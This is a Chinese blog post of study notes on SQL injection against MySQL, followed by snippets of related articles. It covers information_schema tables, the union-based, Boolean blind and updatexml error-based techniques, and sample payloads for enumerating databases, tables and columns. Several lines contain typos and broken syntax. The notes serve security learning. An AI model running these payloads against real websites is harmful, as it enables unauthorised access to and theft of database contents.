SQL注入部分

最新推荐文章于 2024-07-10 00:01:48 发布
最新推荐文章于 2024-07-10 00:01:48 发布
阅读量142 收藏
点赞数
分类专栏: 学习web安全 文章标签: sql 数据库 mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_61823031/article/details/124426446
版权

1.SQL注入介绍

SQL注入就是指web应用程序对用户输入数据的合法性没有判断,前端传入后端的参数是攻击者可控的,并且参数代入数据库查询,攻击者可以通过构造不同的SQL语句来实现对数据库的任意操作
以php语句为例:
$query =“select * from users where id = $_GET[id];

2.SQL注入原理

SQL注入漏洞的产生需要满足一下两个条件。
1.参数用户可控:前端传给后端的参数内容是用户可以控制的
2.参数代入数据库查询:传入的参数拼接到SQL语句,并且带入数据库查询

3.MySI与SQL注入漏洞相关的知识点

在MySQL5.0版本之后,MySQL默认在数据库中存放一个 information.schema 的数据库在该库中,我们需要记住三个表名,分别是schemata,tables, columnSo

  • Schemata表存储的是该用户创建的所有数据库的库名,需要记住该表中记录数据库库名的字段名为schema_name
  • Tables表存储该用户创建的所有数据库的库名和表名,要记住该表中记录数据库库名和表名的字段名分别为table_schematable_name
  • Columns表存储该用户创建的所有数据库的库名、表名、字段名,要记住该表中记录数据库库
    名、表名、字段名的字段名为table_schema table_name columns_name

4.MySQL查询语句

1.在不知道任何条件时,语句如下所示

Select(要查询的字段名)from(库名.表名)

2.在知道一条已知条件时,语句如下所示:
sql Select(要查询的字段名)from(库名.表名)where (已知条件的字段名=已知条件的值)
3.在知道两条已知条件时,语句如下所示:

Select(要查询的字段名)from(库名.表名)where  (已知条件1的字段名=已知条件1的值)and(已知条件2的字段名=已知条件2的值)

Limit的用法

  • Limit的使用格式是imit.,其中m指的是记录开始的位置,从m=0,表示第一条记录;n是指取n条记录
    ·例如:select *from users limit 0,1;
    需要记住的几个函数
    Database():当前网站使用的数据库
    Version():当前mysql的版本
    User():当前mysql的用户
    注释符
    三种注释符号\

  2. – 空格
  3. /**

5.在数据库中测试union注入攻击语句

id = 1
id = 1
id = 1 and 1 = 1
id = 1 and 1 = 2
id = 1 order by 6
id = 1 order by 7
id = 1 union select 1,2,3,4,5,6
id = 1 union select 1,2,database(),4,5,6
Select table_name from information.schema.tables where table_schema = database() limit 0,1
Select column.name from intormation.schema.columns where table_schema = database() and table_name email limit 0,1
Select username from test.users limit 0,1

6.Boolean注入攻击语句

判断数据库库名长度: and length(database())>=1
判断数据库库名: and sustr(database(),1,1)= ‘t’
判断表名:and substr((select table_name from information_schema.tables where tables_chema =‘database()’ limit 0,1),1,1)= ‘u’
判断字段名:and substr((select column_name from information_schema.columns where table_schema = ‘database’ and table_name = 表名 limit 0,1),1,1)= ‘i’
判断数据:and substr((select 列名 from database().表名 limit 0,1),1,1)= ‘z’

7. 报错注入

Updatexmlo函数:
UpdateXml(xml,target,xpath,expr,new,xml)
xml_tarqet: 需要操作的 xml 片段
xpath_expr 需要更新的xml路径(Xpath格式)
new_Xml: 更新后的内容
数据库中演示:
select updatexml(1,concat(0x7e,(select database()),0x7e),0)

Day-3
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL注入总结(部分,持续更新)
zwish的信安之路
07-12 311
SQL注入 暑假无聊,想着整理一下学过的知识,总结一下常见的知识点,濒危下一步的学习打下基础,这是系列第一篇:SQL注入 1、SQL注入原理 SQL注入是因为过于信任用户,未对用户的输入进行过滤,攻击者可以通过将恶意的Sql查询或添加语句插入到应用的输入参数中,再在后台Sql服务器上解析执行,进行攻击 2、SQL注入流程 1、判断注入点及注入类型: 粗略型:提交单引号’ 逻辑型(数字型注入):an...
sql注入详解
m0_67392811的博客
06-12 5783
目录前言? ?一、漏洞原因分析二、漏洞危害三、sql注入防范四、如何挖掘sql注入漏洞五、常见的注入手法联合查询(union注入)报错注入基于布尔的盲注基于时间的盲注HTTP头注入宽字节注入堆叠查询二阶注入六、sql注入getshell的几种方式结构化查询语言(Structured Query Language,缩写:SQL),是一种特殊的编程语言,用于数据库中的标准数据查询语言。SQL注入SQL Injection)是一种常见的Web安全漏洞,主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没
SQL注入部分汇总
qq_48211311的博客
08-13 76
(适合于有一定基础的人群) 用\或者万能公式判断闭合 闭合方式:' " ') ") '))等 order by 或者直接猜有多少位 联合注入: 获取库名和表名 ?id=-1' union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema=database() --+ 获取列名 ?id=-1' union select 1,database(),g...
SQL注入攻击介绍
热门推荐
99度灰的博客
03-30 2万+
SQL注入攻击介绍 一、SQL注入攻击简介 SQL注入攻击是指,后台数据库操作时,如果拼接外部参数到SQL语句中,就可能导致欺骗服务器执行恶意的SQL语句,造成数据泄露、删库、页面篡改等严重后果。按变量类型分为:数字型、字符型;按HTTP提交方式分为:GET注入、POST注入、Cookie注入;按注入方式分为:报错注入、盲注(布尔盲注、时间盲注)、堆叠注入等等。 二、SQL注入分类 按变量类型分类:如SQL语句为select *from user where param=1(数字型)、select *fr
SQL注入攻击与防护
weixin_62707591的博客
06-21 5709
攻击者把SQL命令插入到Web表单的输入域或页面请求的查询字符串,并且插入的恶意SQL命令会导致原有SQL语句作用发生改变,从而得到欺骗服务器执行恶意SQL命令的一种攻击方式。① 概述开源的自动化SQL注入工具,由Python写成② 主要功能扫描、发现、利用给定URL的SQL注入漏洞③ 特点。
细说——SQL注入
LainWith的博客
10-09 7748
目录SQL是什么?什么是SQL注入漏洞原理漏洞原因为什么会有SQL注入注⼊点可能存在的位置漏洞危害提交方法判断注入点判断字符型还是数字型sql注入绕过获取网站路径SQL 注入读写文件1. 数据库支持文件读写2. 当前用户具有文件权限3. 知道文件绝对路径查询方式及报错盲注⭐查询方式报错盲注报错注入函数二次注入原理实施步骤举例堆叠查询DNSlog脑图常见数据库,及注入相关⭐注释符、数据库端口数据库文件后缀名特有的数据库查看当前用户或权限ASCII转换函数不同数据库注入结果的区别⭐Sql注入中连接字符串常用函数
SQL注入
m0_51457307的博客
11-08 2万+
一、什么是SQL注入 SQL注入SQL lnjection)是发生在Web程序中数据库层的安全漏洞,是比较常用的网络攻击方式之一,他不是利用操作系统的BUG来实现攻击,而是针对程序员编写时的疏忽,通过SQL语句,实现无账号登录,甚至修改数据库。也就是说,SQL注入就是在用户输入的字符串中添加SQL语句,如果在设计不良的程序中忽略了检查,那么这些注入进去的SQL语句就会被数据库服务器误认为是正常的SQL语句而运行,攻击者就可以执行计划外的命令或者访问未授权的数据。 二、SQL注入的原理 1.恶意拼接查
SQL 注入攻击介绍
代码星辰的博客
03-12 4642
SQL 注入攻击介绍
SQL注入总结
qq_46081990的博客
04-22 3937
SQL注入是一种将SQL代码插入或添加到应用(用户)的输入参数中的攻击,之后再将这些参数传递给后台的sql服务器加以解析和执行。由于sql语句本身的多样性,以及可用于构造sql语句的编程方法很多,因此凡是构造sql语句的步骤均存在被攻击的潜在风险。Sql注入的方式主要是直接将代码插入参数中,这些参数会被置入sql命令中加以执行。间接的攻击方式是将恶意代码插入字符串中,之后将这些字符串保存到数据库的数据表中或将其当成元数据。当将存储的字符串置入动态sql命令中时,恶意代码就将被执行。
Mybatis防止sql注入的实例
08-30
Mybatis防止sql注入的实例 Mybatis框架作为一款半自动化的持久层框架,其sql语句都要我们自己来手动编写,这个时候当然需要防止sql注入。防止sql注入的方法有很多,例如将sql语句全部替换为存储过程的方式,但这种...
SQL注入漏洞演示源代码
07-15
它会解释如何运行这个演示源代码,可能会描述一些关键的函数或方法,这些是实现SQL注入的关键部分。例如,它可能指出存在漏洞的查询是如何构建的,以及如何通过修改输入参数来触发注入。 接下来,"SQL注入漏洞实例...
SQL注入漏洞全接触
03-03
用户可以提交一段数据库查询代码,根据程序返回的结果,获得某些他想得知的数据,这就是所谓的SQLInjection,即SQL注入SQL注入是从正常的WWW端口访问,而且表面看起来跟一般的Web页面访问没什么区别,所以目前市面...
Sql.rar_sql注入
09-21
SQL注入是一种常见的网络安全威胁,它发生在应用程序未能充分验证或清理用户输入的数据时,导致恶意SQL命令被执行。在本文中,我们将深入探讨SQL注入的概念、工作原理以及如何防范它,特别是针对C#编程环境。 首先...
Sql 导入到 Excel 工具
weixin_43891945的博客
07-09 181
VBA sql into Excel
[高频 SQL 50 题(基础版)]第一千七百五十七题,可回收且低脂产品
最新发布
weixin_45201305的博客
07-10 68
low_fats 是枚举类型,取值为以下两种 ('Y', 'N'),其中 'Y' 表示该产品是低脂产品,'N' 表示不是低脂产品。recyclable 是枚举类型,取值为以下两种 ('Y', 'N'),其中 'Y' 表示该产品可回收,而 'N' 表示不可回收。没什么难度,作为基础题五十题的第一题练手,现在也开始陆续写一些SQL,作为记录,和leetcode一起,大家都加油。编写解决方案找出既是低脂又是可回收的产品编号。是该表的主键(具有唯一值的列)。
SQL】索引过多的缺点
hui_zai_的博客
07-04 404
索引过多的缺点
SQL Server设置端口:跨平台指南
招风的黑耳CSDN
07-09 379
在使用SQL Server时,设置或修改其监听的端口是确保数据库服务安全访问和高效管理的重要步骤。由于SQL Server可以部署在多种操作系统上,包括Windows、Linux和Docker容器等,因此设置端口的步骤和方法也会因平台而异。本文将为您提供一个跨平台的指南,帮助您在不同环境下设置SQL Server的端口。
PostgreSQL 如何处理海量小文件数据的存储和查询?
技术笔记
07-08 816
处理 PostgreSQL 中的海量小文件数据存储和查询是一个复杂的任务,需要考虑存储方式、查询优化、并发控制和性能调优等多个方面。根据实际的业务需求和数据特点,选择合适的解决方案,并不断进行测试和优化,以确保系统的性能和可靠性。🎉相关推荐🍅关注博主🎗️带你畅游技术世界,不错过每一次成长机会!📚领书:PostgreSQL 入门到精通.pdf📙PostgreSQL 中文手册📘PostgreSQL 技术专栏。
sqilabs所有关过关的集合
04-17
"这篇文档是关于SQL注入的学习资料,主要聚焦于SQLi-Labs练习平台,由LCamry编撰。它包含了MySQL注入的基础知识、盲注技巧、数据导入导出操作、增删改函数的使用、HTTP头部的理解以及服务器架构、宽字节注入和堆叠...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值